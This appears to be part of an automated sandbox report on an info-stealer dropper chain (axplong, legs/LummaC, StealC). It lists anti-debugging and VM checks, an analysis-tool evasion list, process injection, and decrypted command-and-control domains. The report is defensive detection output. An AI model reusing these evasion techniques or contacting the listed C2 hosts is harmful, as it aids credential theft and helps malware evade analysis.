                                  Source: liddad.exe, 00000015.00000003.2658374926.0000000000F8D000.00000004.00000020.00020000.00000000.sdmp, liddad.exe, 00000015.00000002.2661089590.0000000000F93000.00000004.00000020.00020000.00000000.sdmp, liddad.exe, 00000015.00000003.2658137433.0000000000F7D000.00000004.00000020.00020000.00000000.sdmp, liddad.exe, 00000015.00000003.2658175825.0000000000F8A000.00000004.00000020.00020000.00000000.sdmp, liddad.exe, 00000015.00000003.2658626108.0000000000F90000.00000004.00000020.00020000.00000000.sdmp, liddad.exe, 00000015.00000003.2659011192.0000000000F92000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlld":
                                  Source: liddad.exe, 00000015.00000003.2579294968.0000000000F36000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllSS>
                                  Source: liddad.exe, 00000015.00000003.2659011192.0000000000F92000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
                                  Source: gold1111111111.exe, 00000013.00000002.2623881290.000000000339E000.00000004.00000020.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000003.2500252161.000000000339A000.00000004.00000020.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000003.2622240824.000000000339E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2798174482.000002103D86C000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000002.2801345249.000002103D86C000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2788204551.000002103D86A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWYn
                                  Source: axplong.exe, 00000005.00000002.2980326735.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000005.00000002.2980326735.0000000000A36000.00000004.00000020.00020000.00000000.sdmp, legs.exe, legs.exe, 0000000A.00000003.2556541983.00000000013BE000.00000004.00000020.00020000.00000000.sdmp, legs.exe, 0000000A.00000003.2497430762.00000000013BE000.00000004.00000020.00020000.00000000.sdmp, legs.exe, 0000000A.00000003.2524814208.00000000013BE000.00000004.00000020.00020000.00000000.sdmp, legs.exe, 0000000A.00000002.2559454354.000000000137C000.00000004.00000020.00020000.00000000.sdmp, legs.exe, 0000000A.00000003.2556017634.000000000137C000.00000004.00000020.00020000.00000000.sdmp, legs.exe, 0000000A.00000003.2510620291.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, legs.exe, 0000000A.00000002.2559951043.00000000013BE000.00000004.00000020.00020000.00000000.sdmp, legs.exe, 0000000A.00000003.2510421518.00000000013B9000.00000004.00000020.00020000.00000000.sdmp, legs.exe, 0000000A.00000003.2523123424.00000000013BD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                  Source: stealc_valenciga.exe, 0000000B.00000002.2606844881.0000000000ECE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2735614382.000002103D896000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWYj
                                  Source: liddad.exe, 00000015.00000002.2659822914.00000000006DB000.00000002.00000001.01000000.00000012.sdmpBinary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
                                  Source: liddad.exe, 00000015.00000003.2579974877.0000000000917000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFsion\Uninstall\{90160000-008C-0000-0000-0000000FF1CE}00000FF1CE}\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-0000-0000000FF1CE}
                                  Source: ebjtOH70jl.exe, 00000000.00000002.1732664662.0000000000C5F000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, 00000001.00000002.1768596796.000000000085F000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000005.00000002.2974791665.000000000085F000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeAPI call chain: ExitProcess graph end nodegraph_1-10391
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeAPI call chain: ExitProcess graph end nodegraph_1-10370
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeAPI call chain: ExitProcess graph end nodegraph_6-14947
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeSystem information queried: ModuleInformationJump to behavior
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeProcess information queried: ProcessInformationJump to behavior

                                  Anti Debugging

                                  barindex
                                  Hides threads from debuggers
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeThread information set: HideFromDebuggerJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread information set: HideFromDebuggerJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread information set: HideFromDebuggerJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeThread information set: HideFromDebugger
                                  Source: C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exeThread information set: HideFromDebugger
                                  Source: C:\Users\user\AppData\Local\Temp\1010748001\834ad20df2.exeThread information set: HideFromDebugger
                                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebugger
                                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebugger
                                  Source: C:\Users\user\AppData\Local\Temp\1010749001\3e641862d3.exeThread information set: HideFromDebugger
                                  Source: C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exeThread information set: HideFromDebugger
                                  Source: C:\Users\user\AppData\Local\Temp\1010750001\305d0bf1b2.exeThread information set: HideFromDebugger
                                  Potentially malicious time measurement code found
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 5_2_04B30613 Start: 04B306A7 End: 04B3066D5_2_04B30613
                                  Tries to detect sandboxes and other dynamic analysis tools (window names)
                                  Source: C:\Users\user\AppData\Local\Temp\1010750001\305d0bf1b2.exeOpen window title or class name: regmonclass
                                  Source: C:\Users\user\AppData\Local\Temp\1010750001\305d0bf1b2.exeOpen window title or class name: gbdyllo
                                  Source: C:\Users\user\AppData\Local\Temp\1010750001\305d0bf1b2.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                                  Source: C:\Users\user\AppData\Local\Temp\1010750001\305d0bf1b2.exeOpen window title or class name: procmon_window_class
                                  Source: C:\Users\user\AppData\Local\Temp\1010750001\305d0bf1b2.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                                  Source: C:\Users\user\AppData\Local\Temp\1010750001\305d0bf1b2.exeOpen window title or class name: ollydbg
                                  Source: C:\Users\user\AppData\Local\Temp\1010750001\305d0bf1b2.exeOpen window title or class name: filemonclass
                                  Source: C:\Users\user\AppData\Local\Temp\1010750001\305d0bf1b2.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                                  Source: C:\Users\user\AppData\Local\Temp\1010750001\305d0bf1b2.exeFile opened: NTICE
                                  Source: C:\Users\user\AppData\Local\Temp\1010750001\305d0bf1b2.exeFile opened: SICE
                                  Source: C:\Users\user\AppData\Local\Temp\1010750001\305d0bf1b2.exeFile opened: SIWVID
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeProcess queried: DebugPortJump to behavior
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeProcess queried: DebugPortJump to behavior
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeProcess queried: DebugPortJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exeProcess queried: DebugPort
                                  Source: C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exeProcess queried: DebugPort
                                  Source: C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exeProcess queried: DebugPort
                                  Source: C:\Users\user\AppData\Local\Temp\1010748001\834ad20df2.exeProcess queried: DebugPort
                                  Source: C:\Users\user\AppData\Local\Temp\1010748001\834ad20df2.exeProcess queried: DebugPort
                                  Source: C:\Users\user\AppData\Local\Temp\1010748001\834ad20df2.exeProcess queried: DebugPort
                                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPort
                                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPort
                                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPort
                                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPort
                                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPort
                                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPort
                                  Source: C:\Users\user\AppData\Local\Temp\1010749001\3e641862d3.exeProcess queried: DebugPort
                                  Source: C:\Users\user\AppData\Local\Temp\1010749001\3e641862d3.exeProcess queried: DebugPort
                                  Source: C:\Users\user\AppData\Local\Temp\1010749001\3e641862d3.exeProcess queried: DebugPort
                                  Source: C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exeProcess queried: DebugPort
                                  Source: C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exeProcess queried: DebugPort
                                  Source: C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exeProcess queried: DebugPort
                                  Source: C:\Users\user\AppData\Local\Temp\1010750001\305d0bf1b2.exeProcess queried: DebugPort
                                  Source: C:\Users\user\AppData\Local\Temp\1010750001\305d0bf1b2.exeProcess queried: DebugPort
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeCode function: 0_2_053E0CD1 rdtsc 0_2_053E0CD1
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeCode function: 6_2_00465020 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00465020
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeCode function: 0_2_00AA645B mov eax, dword ptr fs:[00000030h]0_2_00AA645B
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeCode function: 0_2_00AAA1C2 mov eax, dword ptr fs:[00000030h]0_2_00AAA1C2
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 1_2_006AA1C2 mov eax, dword ptr fs:[00000030h]1_2_006AA1C2
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 1_2_006A645B mov eax, dword ptr fs:[00000030h]1_2_006A645B
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 5_2_006AA1C2 mov eax, dword ptr fs:[00000030h]5_2_006AA1C2
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 5_2_006A645B mov eax, dword ptr fs:[00000030h]5_2_006A645B
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeCode function: 6_2_0048519E mov edi, dword ptr fs:[00000030h]6_2_0048519E
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeCode function: 6_2_00461614 mov edi, dword ptr fs:[00000030h]6_2_00461614
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeCode function: 8_2_006C6212 mov eax, dword ptr fs:[00000030h]8_2_006C6212
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeCode function: 8_2_006BDD80 mov eax, dword ptr fs:[00000030h]8_2_006BDD80
                                  Source: C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exeCode function: 9_2_00E06212 mov eax, dword ptr fs:[00000030h]9_2_00E06212
                                  Source: C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exeCode function: 9_2_00DFDD80 mov eax, dword ptr fs:[00000030h]9_2_00DFDD80
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeCode function: 6_2_0046FE2C GetProcessHeap,6_2_0046FE2C
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeCode function: 6_2_00465014 SetUnhandledExceptionFilter,6_2_00465014
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeCode function: 6_2_00465020 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00465020
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeCode function: 6_2_00464C64 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00464C64
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeCode function: 6_2_0046B4B9 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_0046B4B9
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeCode function: 8_2_006BA3C5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_006BA3C5
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeCode function: 8_2_006BA528 SetUnhandledExceptionFilter,8_2_006BA528
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeCode function: 8_2_006B9AD8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_006B9AD8
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeCode function: 8_2_006BED8D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_006BED8D
                                  Source: C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exeCode function: 9_2_00DFA3C5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00DFA3C5
                                  Source: C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exeCode function: 9_2_00DFA528 SetUnhandledExceptionFilter,9_2_00DFA528
                                  Source: C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exeCode function: 9_2_00DF9AD8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_00DF9AD8
                                  Source: C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exeCode function: 9_2_00DFED8D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00DFED8D
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeMemory protected: page guard

                                  HIPS / PFW / Operating System Protection Evasion

                                  barindex
                                  Yara detected Powershell download and execute
                                  Source: Yara matchFile source: Process Memory Space: stealc_valenciga.exe PID: 6128, type: MEMORYSTR
                                  Contains functionality to inject code into remote processes
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeCode function: 6_2_0048519E GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,6_2_0048519E
                                  Injects a PE file into a foreign processes
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeMemory written: C:\Users\user\AppData\Local\Temp\1001527001\legs.exe base: 400000 value starts with: 4D5AJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeMemory written: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exe base: 400000 value starts with: 4D5A
                                  LummaC encrypted strings found
                                  Source: legs.exe, 00000006.00000002.2395960727.0000000001637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: rapeflowwj.lat
                                  Source: legs.exe, 00000006.00000002.2395960727.0000000001637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: crosshuaht.lat
                                  Source: legs.exe, 00000006.00000002.2395960727.0000000001637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: sustainskelet.lat
                                  Source: legs.exe, 00000006.00000002.2395960727.0000000001637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: aspecteirs.lat
                                  Source: legs.exe, 00000006.00000002.2395960727.0000000001637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: energyaffai.lat
                                  Source: legs.exe, 00000006.00000002.2395960727.0000000001637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: necklacebudi.lat
                                  Source: legs.exe, 00000006.00000002.2395960727.0000000001637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: discokeyus.lat
                                  Source: legs.exe, 00000006.00000002.2395960727.0000000001637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: grannyejh.lat
                                  Source: legs.exe, 00000006.00000002.2395960727.0000000001637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: pancakedipyps.click
                                  Source: gold1111111111.exe, 00000011.00000002.2486903254.0000000002E82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: cloudewahsj.shop
                                  Source: gold1111111111.exe, 00000011.00000002.2486903254.0000000002E82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: rabidcowse.shop
                                  Source: gold1111111111.exe, 00000011.00000002.2486903254.0000000002E82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: noisycuttej.shop
                                  Source: gold1111111111.exe, 00000011.00000002.2486903254.0000000002E82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: tirepublicerj.shop
                                  Source: gold1111111111.exe, 00000011.00000002.2486903254.0000000002E82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: framekgirus.shop
                                  Source: gold1111111111.exe, 00000011.00000002.2486903254.0000000002E82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: wholersorie.shop
                                  Source: gold1111111111.exe, 00000011.00000002.2486903254.0000000002E82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: abruptyopsn.shop
                                  Source: gold1111111111.exe, 00000011.00000002.2486903254.0000000002E82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: nearycrepso.shop
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1001527001\legs.exe "C:\Users\user\AppData\Local\Temp\1001527001\legs.exe" Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1004899001\am209.exe "C:\Users\user\AppData\Local\Temp\1004899001\am209.exe" Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exe "C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exe" Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1009574001\gold123.exe "C:\Users\user\AppData\Local\Temp\1009574001\gold123.exe" Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exe "C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exe" Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1010458001\liddad.exe "C:\Users\user\AppData\Local\Temp\1010458001\liddad.exe" Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe "C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe" Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exe "C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exe" Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1010748001\834ad20df2.exe "C:\Users\user\AppData\Local\Temp\1010748001\834ad20df2.exe" Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1010749001\3e641862d3.exe "C:\Users\user\AppData\Local\Temp\1010749001\3e641862d3.exe" Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1010750001\305d0bf1b2.exe "C:\Users\user\AppData\Local\Temp\1010750001\305d0bf1b2.exe" Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeProcess created: C:\Users\user\AppData\Local\Temp\1001527001\legs.exe "C:\Users\user\AppData\Local\Temp\1001527001\legs.exe"Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeProcess created: C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exe "C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exe" Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeProcess created: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exe "C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exe"
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeProcess created: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe "C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe"
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
                                  Source: C:\Users\user\AppData\Local\Temp\1010748001\834ad20df2.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                                  Source: axplong.exe, axplong.exe, 00000005.00000002.2976747778.00000000008A8000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: |Program Manager
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 5_2_0068DCC1 cpuid 5_2_0068DCC1
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeCode function: GetLocaleInfoW,6_2_004730D1
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeCode function: EnumSystemLocalesW,6_2_00473086
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,6_2_00473178
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeCode function: GetLocaleInfoW,6_2_0047327E
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,6_2_00472A13
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeCode function: GetLocaleInfoW,6_2_0046F21C
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeCode function: EnumSystemLocalesW,6_2_00472C64
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,6_2_00472CFF
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeCode function: EnumSystemLocalesW,6_2_00472F52
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeCode function: EnumSystemLocalesW,6_2_0046F717
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeCode function: GetLocaleInfoW,6_2_00472FB1
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeCode function: EnumSystemLocalesW,8_2_006D22E8
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeCode function: EnumSystemLocalesW,8_2_006D2333
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeCode function: EnumSystemLocalesW,8_2_006D23CE
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeCode function: EnumSystemLocalesW,8_2_006C83DC
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,8_2_006D2459
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeCode function: GetLocaleInfoW,8_2_006D26AC
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,8_2_006D27D2
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeCode function: GetLocaleInfoW,8_2_006C88FE
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeCode function: GetLocaleInfoW,8_2_006D28D8
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,8_2_006D29A7
                                  Source: C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exeCode function: EnumSystemLocalesW,9_2_00E122E8
                                  Source: C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exeCode function: EnumSystemLocalesW,9_2_00E123CE
                                  Source: C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exeCode function: EnumSystemLocalesW,9_2_00E083DC
                                  Source: C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exeCode function: EnumSystemLocalesW,9_2_00E12333
                                  Source: C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,9_2_00E12459
                                  Source: C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exeCode function: GetLocaleInfoW,9_2_00E126AC
                                  Source: C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,9_2_00E127D2
                                  Source: C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exeCode function: GetLocaleInfoW,9_2_00E088FE
                                  Source: C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exeCode function: GetLocaleInfoW,9_2_00E128D8
                                  Source: C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,9_2_00E129A7
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                                  Source: C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                                  Source: C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
